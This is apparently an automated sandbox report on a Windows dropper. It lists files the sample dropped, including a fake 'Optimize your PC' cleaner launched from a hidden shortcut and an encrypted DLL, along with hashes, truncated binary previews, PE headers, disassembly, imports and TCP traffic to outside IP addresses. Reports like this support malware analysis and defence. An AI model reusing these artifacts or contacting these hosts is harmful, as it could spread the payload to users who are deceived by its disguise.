                                                      SHA1:1493A5447EB8156A7D7AECFF60EE8BFBA2209526
                                                      SHA-256:C394B068AA87264419F60838A8812B750E67CF93F2494C62B9078C3708072568
                                                      SHA-512:A71C7ED5DFDDA22F095DC99B16E8342A42E3361BE16E0241DBF8983DD0D5F6E90EB0299AAC1815CF78AD3A9F15FA89B42B720B7F818EE5F502300F102EF4C93E
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 29%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.................. ... ....@.. .......................`............`.................................T...O.... ..2............(<......@......8................................................ ............... ..H............text........ ...................... ..`.rsrc...2.... ......................@..@.reloc.......@......................@..B........................H.......h...@E......T........;............................................(....*..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....r=..p~....o....t....*j(....rM..p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*.~....*..(....*Vs....(....t.........*N.(.....(.....(....*....0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\fuckingdllENCR[1].dll

                                                      Download File
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):94224
                                                      Entropy (8bit):7.998072640845361
                                                      Encrypted:true
                                                      SSDEEP:1536:NsbI9W6dHdtnEXOxZpPzIUcETzNtXofjmgGTeJduLLt+YBPoJTMRmNXg30:KWW6TZVz9PNtXo8M5OR0
                                                      MD5:418619EA97671304AF80EC60F5A50B62
                                                      SHA1:F11DCD709BDE2FC86EBBCCD66E1CE68A8A3F9CB6
                                                      SHA-256:EB7ECE66C14849064F462DF4987D6D59073D812C44D81568429614581106E0F4
                                                      SHA-512:F2E1AE47B5B0A5D3DD22DD6339E15FEE3D7F04EF03917AE2A7686E73E9F06FB95C8008038C018939BB9925F395D765C9690BF7874DC5E90BC2F77C1E730D3A00
                                                      Malicious:false
                                                      Preview:...mi...};...F".).T..'K;....O.Y0:.....3j.\.Ij.2R.P....C...q.|.2.....iR2W.F.C=MU......H6...A.....@..O.c...M.x8...L..- ..b..|.C...Z}.w...l.a.aT...br,...6w#.j.P.li.=......o.......S.{..R........5....#;....-....b+..G(.>..Q.....iN{.+y...ZC.z3sE...T..2.J...3.9U.4&..P......."wI.....@....x%>..D..'z.^....^(.....NC.[[k..........V]G..)e.....`.......K/L.Ul..F.."..8$.Ad....:i.g..0.d...[...T"l.U.M.=.0...,..,.ku.W,.....7`Q.Fi=w...u..:..Q-.R.}0...L.....n...t.nv.....z....e..I.C.....9.V.~1+[]..7...xQ........$.L..o.eQ./.b..Z......p].;i*)...#.b...%1........@...G..[......./.c.Z......G.:..n..E.i.O..o.U.B.Px....1{,a.....#k.dj..L4...}.d<......Iyy.J..f.W..,^vV.Ao.K."+OX8!F...YP...u.-..Bik.[.u...&Wt..P...m....^ ..k~.....l..o.zMV.!s..h...{.n2;z...K..?S..-...eW...c.....-V.bg..9.I..g.x.g...}.'.5..(*P...J#..:.IS..D}.v......jK9.LQF...oOhV...).h.v^-..F...<.....Vh.1....!...!...BYc..C?..D2.....2.K(..6....B....D..ay..=|....'....[1.~.YB:./...A`...=..F..K...........

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\ping[1].htm

                                                      Download File
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:V:V
                                                      MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                      SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                      SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                      SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                      Malicious:false
                                                      Preview:0

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\ping[1].htm

                                                      Download File
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):17
                                                      Entropy (8bit):3.1751231351134614
                                                      Encrypted:false
                                                      SSDEEP:3:nCmxEl:Cmc
                                                      MD5:064DB2A4C3D31A4DC6AA2538F3FE7377
                                                      SHA1:8F877AE1873C88076D854425221E352CA4178DFA
                                                      SHA-256:0A3EC2C4FC062D561F0DC989C6699E06FFF850BBDA7923F14F26135EF42107C0
                                                      SHA-512:CA94BC1338FC283C3E5C427065C29BA32C5A12170782E18AA0292722826C5CB4C3B29A5134464FFEB67A77CD85D8E15715C17A049B7AD4E2C890E97385751BEE
                                                      Malicious:false
                                                      Preview:UwUoooIIrwgh24uuU

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\dll[1]

                                                      Download File
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):242176
                                                      Entropy (8bit):6.47050397947197
                                                      Encrypted:false
                                                      SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                                      MD5:2ECB51AB00C5F340380ECF849291DBCF
                                                      SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                                      SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                                      SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....*:..s.....(....*.......*2r...p(;...&*Vr...p.....r...p.....*..(....*>.........}....*...(C.....o...(D...(E...}.....(F...(E...(G...&*>.........}....*...(C.....o...(D...}.....(F...(E...(H...&*".......*>.........}....*R..} .....{ ...oo...*..{ ...*"..}!...*..{!...*...}.....{#....{....op....{....,...{ ...oo...*..{!...oo...*..{....*B.....su...(v...*..{#....{#...

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\library[1].htm

                                                      Download File
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:V:V
                                                      MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                      SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                      SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                      SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                      Malicious:false
                                                      Preview:0

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\ping[1].htm

                                                      Download File
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:V:V
                                                      MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                      SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                      SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                      SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                      Malicious:false
                                                      Preview:0

                                                      C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Bunifu_UI_v1.5.3.dll

                                                      Download File
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):242176
                                                      Entropy (8bit):6.47050397947197
                                                      Encrypted:false
                                                      SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                                      MD5:2ECB51AB00C5F340380ECF849291DBCF
                                                      SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                                      SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                                      SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....*:..s.....(....*.......*2r...p(;...&*Vr...p.....r...p.....*..(....*>.........}....*...(C.....o...(D...(E...}.....(F...(E...(G...&*>.........}....*...(C.....o...(D...}.....(F...(E...(H...&*".......*>.........}....*R..} .....{ ...oo...*..{ ...*"..}!...*..{!...*...}.....{#....{....op....{....,...{ ...oo...*..{!...oo...*..{....*B.....su...(v...*..{#....{#...

                                                      C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe

                                                      Download File
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):3947920
                                                      Entropy (8bit):7.275018147968825
                                                      Encrypted:false
                                                      SSDEEP:49152:+/PD/DL/D9CuZrr2h60qPPB+lJJkF9IC966eB+lJJkF9IC966eB+lJJkF9IC966h:+3D///UUrP43m8C/3m8C/3m8C5
                                                      MD5:04514BD4962F7D60679434E0EBE49184
                                                      SHA1:1493A5447EB8156A7D7AECFF60EE8BFBA2209526
                                                      SHA-256:C394B068AA87264419F60838A8812B750E67CF93F2494C62B9078C3708072568
                                                      SHA-512:A71C7ED5DFDDA22F095DC99B16E8342A42E3361BE16E0241DBF8983DD0D5F6E90EB0299AAC1815CF78AD3A9F15FA89B42B720B7F818EE5F502300F102EF4C93E
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 29%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.................. ... ....@.. .......................`............`.................................T...O.... ..2............(<......@......8................................................ ............... ..H............text........ ...................... ..`.rsrc...2.... ......................@..@.reloc.......@......................@..B........................H.......h...@E......T........;............................................(....*..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....r=..p~....o....t....*j(....rM..p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*.~....*..(....*Vs....(....t.........*N.(.....(.....(....*....0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.

                                                      C:\Users\user\Desktop\Cleaner.lnk

                                                      Download File
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Mon Oct 3 23:30:18 2022, mtime=Mon Oct 3 23:30:18 2022, atime=Mon Oct 3 23:30:18 2022, length=3947920, window=hide
                                                      Category:dropped
                                                      Size (bytes):2214
                                                      Entropy (8bit):3.9313193863453852
                                                      Encrypted:false
                                                      SSDEEP:48:81utFiwiLRwztCGqObJilZGqOnqV1oB6:8mMFFSvbhK1o
                                                      MD5:C33A2A09C2B58C5F99B46ACF927B39C9
                                                      SHA1:E3416DF6B82B0D497B66FD70632C100EFD909DA2
                                                      SHA-256:85E6634779D4685011A7D1B2988DCE28267C4C314D4D0F0D5F9CB431D36AD857
                                                      SHA-512:B12A716DB41AF508A5A05DBAF27774571E9F8AC2D30F1316BD3F472B9B39A7972E106ED7EA6B469428EFE4DEEDBDCDD5AF459CD33429CA7B95473F1956CE071A
                                                      Malicious:false
                                                      Preview:L..................F.@.. ...sZ.z.......z.......z.....=<.....................@.:..DG..Yr?.D..U..k0.&...&...........-..F`......Dq|........t...CFSF..1......NM...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......NM.DU.......Y.....................R..A.p.p.D.a.t.a...B.P.1......U....Local.<.......NM.DU.......Y.....................z..L.o.c.a.l.....N.1.....DU....Temp..:.......NM.DU.......Y.......................T.e.m.p.......1.....DU....6CLVSX~1..j......DU..DU...............................6.c.l.v.S.x.8.e.n.7.1.S.U.l.1.h.U.u.z.Q.6.n.5.6.l.W.M.0.....b.2..=<.DU.. .Cleaner.exe.H......DU..DU..............................(.C.l.e.a.n.e.r...e.x.e.......z...............-.......y..............U.....C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe....O.p.t.i.m.i.z.e. .y.o.u.r. .P.C.>.....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.6.c.l.v.S.x.8.e.n.7.1.S.U.l.1.h.U.u.z.Q.6.n.5.6.l.W.M.0.\.C.l.e.a.n.e.r...e.x.e.K.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Entropy (8bit):7.462227283357498
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:file.exe
                                                      File size:238080
                                                      MD5:526fde9e61b1b4835885973331fa1616
                                                      SHA1:ebbb0c3586b8a0244585eacb44ca125ac933ad8e
                                                      SHA256:093741e4079a8092ba9d94653cb4f11c15fbe1e9ef53690e91628c61f0cc9440
                                                      SHA512:ceff6066cd30ead43c4afcdc1b227ae114d4174fb75ff68c1495cbc6ef7bcb158bf2535669bd9add353e72ed3b97df48a9ad4cf21941db9d702d6f786bbae318
                                                      SSDEEP:6144:oKFyXCCNTdMc9uzUCEJ/z1qWYHR+qvkqs3PZ5E:NFoC+ZUzl+RWR+1qs/s
                                                      TLSH:7B34F1123CD18932C93E74718C71CA5277BFB8816672D94A76FC1AAE5F626C06E30397
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}...............N1......N'.................D....N ......N0......N5.....Rich............PE..L.....Mb...........................

                                                      File Icon

                                                      Icon Hash:3370686068686869

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x404be7
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                      DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x624D8102 [Wed Apr 6 12:01:06 2022 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:5
                                                      OS Version Minor:0
                                                      File Version Major:5
                                                      File Version Minor:0
                                                      Subsystem Version Major:5
                                                      Subsystem Version Minor:0
                                                      Import Hash:c9c09dee9cb4e9617f155f42be2e2cc0

                                                      Entrypoint Preview

                                                      Instruction
                                                      call 00007F16B8E0F99Bh
                                                      jmp 00007F16B8E0C52Dh
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      mov ecx, dword ptr [esp+04h]
                                                      test ecx, 00000003h
                                                      je 00007F16B8E0C6D6h
                                                      mov al, byte ptr [ecx]
                                                      add ecx, 01h
                                                      test al, al
                                                      je 00007F16B8E0C700h
                                                      test ecx, 00000003h
                                                      jne 00007F16B8E0C6A1h
                                                      add eax, 00000000h
                                                      lea esp, dword ptr [esp+00000000h]
                                                      lea esp, dword ptr [esp+00000000h]
                                                      mov eax, dword ptr [ecx]
                                                      mov edx, 7EFEFEFFh
                                                      add edx, eax
                                                      xor eax, FFFFFFFFh
                                                      xor eax, edx
                                                      add ecx, 04h
                                                      test eax, 81010100h
                                                      je 00007F16B8E0C69Ah
                                                      mov eax, dword ptr [ecx-04h]
                                                      test al, al
                                                      je 00007F16B8E0C6E4h
                                                      test ah, ah
                                                      je 00007F16B8E0C6D6h
                                                      test eax, 00FF0000h
                                                      je 00007F16B8E0C6C5h
                                                      test eax, FF000000h
                                                      je 00007F16B8E0C6B4h
                                                      jmp 00007F16B8E0C67Fh
                                                      lea eax, dword ptr [ecx-01h]
                                                      mov ecx, dword ptr [esp+04h]
                                                      sub eax, ecx
                                                      ret
                                                      lea eax, dword ptr [ecx-02h]
                                                      mov ecx, dword ptr [esp+04h]
                                                      sub eax, ecx
                                                      ret
                                                      lea eax, dword ptr [ecx-03h]
                                                      mov ecx, dword ptr [esp+04h]
                                                      sub eax, ecx
                                                      ret
                                                      lea eax, dword ptr [ecx-04h]
                                                      mov ecx, dword ptr [esp+04h]
                                                      sub eax, ecx
                                                      ret
                                                      cmp ecx, dword ptr [00435A7Ch]
                                                      jne 00007F16B8E0C6B4h
                                                      rep ret
                                                      jmp 00007F16B8E0F983h
                                                      push eax
                                                      push dword ptr fs:[00000000h]
                                                      lea eax, dword ptr [esp+0Ch]
                                                      sub esp, dword ptr [esp+0Ch]
                                                      push ebx
                                                      push esi
                                                      push edi
                                                      mov dword ptr [eax], ebp

                                                      Rich Headers

                                                      Programming Language:
                                                      • [ASM] VS2008 build 21022
                                                      • [ C ] VS2008 build 21022
                                                      • [IMP] VS2005 build 50727
                                                      • [C++] VS2008 build 21022
                                                      • [RES] VS2008 build 21022
                                                      • [LNK] VS2008 build 21022

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xe0ec0x50.text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x1910000x4bf8.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x12100x1c.text
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x2c780x18.text
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2c300x40.text
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x10000x1d8.text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000xdbe40xdc00False0.4849609375data5.899490920975358IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .data0xf0000x181d1c0x27600False0.9495845734126984data7.865940586372942IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .rsrc0x1910000x4bf80x4c00False0.5913342927631579data5.603732133139699IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountry
                                                      RT_ICON0x1912b00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors
                                                      RT_ICON0x191b580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216
                                                      RT_ICON0x1941000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096
                                                      RT_STRING0x1953a80x42data
                                                      RT_STRING0x1953f00x280data
                                                      RT_STRING0x1956700x3cedata
                                                      RT_STRING0x195a400x1b2data
                                                      RT_ACCELERATOR0x1951d80x80data
                                                      RT_GROUP_ICON0x1951a80x30data
                                                      RT_VERSION0x1952680x140MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
                                                      None0x1952580xadata

                                                      Imports

                                                      DLLImport
                                                      KERNEL32.dllLoadLibraryA, InterlockedPushEntrySList, GetConsoleAliasesA, ReadFile, ReadConsoleW, GetVolumeInformationA, GetComputerNameA, LocalFree, InterlockedDecrement, SetSystemTimeAdjustment, SetLocaleInfoA, FindNextVolumeA, FindNextChangeNotification, CopyFileExA, MoveFileWithProgressW, VerifyVersionInfoW, LocalSize, FileTimeToDosDateTime, DebugBreak, GlobalGetAtomNameA, IsBadWritePtr, FindResourceA, GetComputerNameExA, GetProcAddress, GetStringTypeW, GetFileTime, GetConsoleAliasesLengthW, GetVolumeNameForVolumeMountPointA, DeleteVolumeMountPointA, GetCPInfo, GetQueuedCompletionStatus, MoveFileWithProgressA, CopyFileA, lstrcpynW, WriteConsoleW, GetBinaryTypeW, WriteConsoleOutputA, GetCommandLineA, InterlockedIncrement, CreateActCtxW, FormatMessageA, GetModuleHandleW, GetModuleHandleA, EnterCriticalSection, GetStringTypeExA, OpenMutexW, FindResourceW, RtlCaptureContext, InterlockedExchange, InitializeCriticalSectionAndSpinCount, DeleteFiber, InterlockedExchangeAdd, EnumDateFormatsA, GetPrivateProfileStructA, GetNamedPipeHandleStateW, RegisterWaitForSingleObject, LocalAlloc, QueryMemoryResourceNotification, SetLastError, GetProcessPriorityBoost, GetMailslotInfo, HeapWalk, SetFilePointer, SetConsoleMode, RaiseException, RtlUnwind, GetLastError, MoveFileA, DeleteFileA, GetStartupInfoA, HeapAlloc, HeapFree, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, DeleteCriticalSection, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, LeaveCriticalSection, VirtualAlloc, HeapReAlloc, HeapSize, GetACP, GetOEMCP, IsValidCodePage, GetLocaleInfoA, GetStringTypeA, MultiByteToWideChar, LCMapStringA, LCMapStringW
                                                      USER32.dllCharUpperBuffW
                                                      WINHTTP.dllWinHttpCreateUrl

                                                      Network Behavior

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Oct 3, 2022 17:29:56.533652067 CEST4969380192.168.2.5208.67.104.97
                                                      Oct 3, 2022 17:29:56.561080933 CEST8049693208.67.104.97192.168.2.5
                                                      Oct 3, 2022 17:29:56.561252117 CEST4969380192.168.2.5208.67.104.97
                                                      Oct 3, 2022 17:29:56.561955929 CEST4969380192.168.2.5208.67.104.97
                                                      Oct 3, 2022 17:29:56.589442968 CEST8049693208.67.104.97192.168.2.5
                                                      Oct 3, 2022 17:29:58.568043947 CEST8049693208.67.104.97192.168.2.5
                                                      Oct 3, 2022 17:29:58.568248987 CEST4969380192.168.2.5208.67.104.97
                                                      Oct 3, 2022 17:29:59.656677961 CEST4969480192.168.2.585.31.46.167
                                                      Oct 3, 2022 17:29:59.684041977 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.684155941 CEST4969480192.168.2.585.31.46.167
                                                      Oct 3, 2022 17:29:59.693042994 CEST4969480192.168.2.585.31.46.167
                                                      Oct 3, 2022 17:29:59.720258951 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.721107960 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.721162081 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.721191883 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.721223116 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.721255064 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.721254110 CEST4969480192.168.2.585.31.46.167
                                                      Oct 3, 2022 17:29:59.721254110 CEST4969480192.168.2.585.31.46.167
                                                      Oct 3, 2022 17:29:59.721286058 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.721317053 CEST4969480192.168.2.585.31.46.167
                                                      Oct 3, 2022 17:29:59.721318007 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.721317053 CEST4969480192.168.2.585.31.46.167
                                                      Oct 3, 2022 17:29:59.721352100 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.721360922 CEST4969480192.168.2.585.31.46.167
                                                      Oct 3, 2022 17:29:59.721385956 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.721390009 CEST4969480192.168.2.585.31.46.167
                                                      Oct 3, 2022 17:29:59.721417904 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.721421957 CEST4969480192.168.2.585.31.46.167
                                                      Oct 3, 2022 17:29:59.721456051 CEST4969480192.168.2.585.31.46.167
                                                      Oct 3, 2022 17:29:59.748449087 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.748493910 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.748516083 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.748538017 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.748544931 CEST4969480192.168.2.585.31.46.167
                                                      Oct 3, 2022 17:29:59.748559952 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.748583078 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.748598099 CEST4969480192.168.2.585.31.46.167
                                                      Oct 3, 2022 17:29:59.748605967 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.748626947 CEST4969480192.168.2.585.31.46.167
                                                      Oct 3, 2022 17:29:59.748630047 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.748652935 CEST4969480192.168.2.585.31.46.167
                                                      Oct 3, 2022 17:29:59.748655081 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.748678923 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.748697042 CEST4969480192.168.2.585.31.46.167
                                                      Oct 3, 2022 17:29:59.748703003 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.748725891 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.748733044 CEST4969480192.168.2.585.31.46.167
                                                      Oct 3, 2022 17:29:59.748749018 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.748770952 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.748778105 CEST4969480192.168.2.585.31.46.167
                                                      Oct 3, 2022 17:29:59.748795033 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.748815060 CEST4969480192.168.2.585.31.46.167
                                                      Oct 3, 2022 17:29:59.748816013 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.748837948 CEST4969480192.168.2.585.31.46.167
                                                      Oct 3, 2022 17:29:59.748838902 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.748862028 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.748872042 CEST4969480192.168.2.585.31.46.167
                                                      Oct 3, 2022 17:29:59.748883963 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.748894930 CEST4969480192.168.2.585.31.46.167
                                                      Oct 3, 2022 17:29:59.748908043 CEST804969485.31.46.167192.168.2.5
